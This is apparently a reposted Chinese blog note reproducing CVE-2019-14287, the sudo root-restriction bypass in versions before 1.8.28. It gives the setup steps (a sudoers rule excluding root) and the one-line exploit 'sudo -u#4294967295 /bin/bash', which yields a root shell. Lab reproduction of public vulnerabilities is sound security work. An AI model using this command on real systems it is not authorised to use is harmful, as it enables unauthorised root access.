(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现
Posted szsecnote
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现相关的知识,希望对你有一定的参考价值。
1:查看测试机sudo版本号,确认是受影响版本。
2:创建账号test
3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加:
test ALL=(ALL,!root) /bin/bash
4:登录test账号,
sudo -u#4294967295 /bin/bash
受影响的Sudo版本:
1.8.28之前的Sudo版本会受到影响。
=======================================
参考链接:
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw
以上是关于(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章
2019-10-16,sudo提权漏洞(CVE-2019-14287)实现